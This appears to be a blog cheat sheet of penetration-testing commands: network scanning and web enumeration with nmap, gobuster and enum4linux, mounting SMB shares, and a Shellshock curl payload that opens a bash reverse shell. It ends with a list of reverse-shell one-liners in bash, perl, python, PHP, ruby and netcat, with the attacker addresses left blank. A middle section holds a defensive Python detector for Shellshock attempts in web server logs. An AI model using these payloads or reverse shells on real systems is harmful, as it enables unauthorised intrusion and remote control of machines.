This is going to be an always *under construction* sort of page.
My favorite enumeration techniques will slowly appear here with more and more explanations to follow – remember #DontWaitEnumerate

// Find out what’s connected
netdiscover -r

// My favorite Nmap scan

nmap -sS -A -O -n -T5

-sS = SYN scan
-A = OS detection / version detection / default scripts / traceroute
-O = Operating system detection
-n = no DNS resolution
-T5 = timing template (5 = fastest and noisiest)

// usage of curl to show the robots.txt file

curl http://[targetIP]/robots.txt

// example of curl to establish a bash shell into a server running on the squid port

curl -x [proxyIP:squidport] -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/ 0>&1" [shellshock reverse tcp]

-x = use proxy
-H = set a request header (here the User-Agent, which carries the Shellshock payload)
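The `() {` header trick above is also exactly what a defender looks for on the web server side. As an added example (not from the original post), here is a small Python parser over constructed combined-format access log lines that flags Shellshock-style function definitions in the User-Agent and Referer headers; the function names and the sample lines are my own.

```python
import re
from typing import List, Dict

# Apache/Nginx "combined" log format:
# src ident user [timestamp] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock signature: an empty bash function definition "() {" with optional
# whitespace. Real browsers send parentheses in User-Agents, e.g. "(X11; Linux)",
# but never an empty pair followed by a brace, so this stays specific.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def find_shellshock_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per log line whose User-Agent or Referer carries a
    Shellshock-style function definition (hypothetical helper for this page)."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not combined format; a real pipeline would count these
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({
                    "src": m.group("src"),
                    "ts": m.group("ts"),
                    "request": m.group("request"),
                    "field": field,
                    "value": m.group(field),
                })
                break
    return hits


# Constructed sample lines (not real traffic); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges. Line 2 mimics the curl -H pattern.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2019:13:55:36 +0000] "GET /robots.txt HTTP/1.1" 200 51 "-" "curl/7.64.0"',
    '198.51.100.9 - - [10/Oct/2019:13:55:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { ignored;}; /usr/bin/id"',
    '203.0.113.8 - - [10/Oct/2019:13:56:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.9 - - [10/Oct/2019:13:56:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "() {:;}; echo vulnerable" "curl/7.64.0"',
]

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} {hit['request']} <- {hit['field']}: {hit['value']!r}")
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file's lines; a 200 status on a `/cgi-bin/` request with such a header is the strongest signal that the attempt reached a CGI handler.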

// bruteforce fuzzing of web content

gobuster -u [targetIP] -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

-u = Target URL
-w = Wordlist
-s = status codes to show, e.g. -s '200,204'
-e = expanded mode (print full URLs in the results)

// further enumeration
enum4linux [target]

// connect to a MySQL server
mysql -h localhost -P 3306 -u root -p [db_name]

// Mount an SMB share that allows guest access
mkdir /mnt/cifs
mount -t cifs '//[target-ip]/share$' -o username=guest /mnt/cifs/
ls /mnt/cifs/

// Attempt to ssh
ssh user@[targetIP]
then enter password

// Once in, first things first: try sudo su with the same password!!! //

// Also try [p00p]

cd /tmp
/tmp$ ls -lah
total 8.0K
4.0K drwxrwxrwt 2 root root 4.0K

Another place to look is PentestMonkeys!

bash -i >& /dev/tcp/ 0>&1

perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

// PHP
php -r '$sock=fsockopen("",9999);exec("/bin/sh -i <&3 >&3 2>&3");'
If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

ruby -rsocket -e'f=TCPSocket.open("",9999).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc -e /bin/sh [IP] 9999
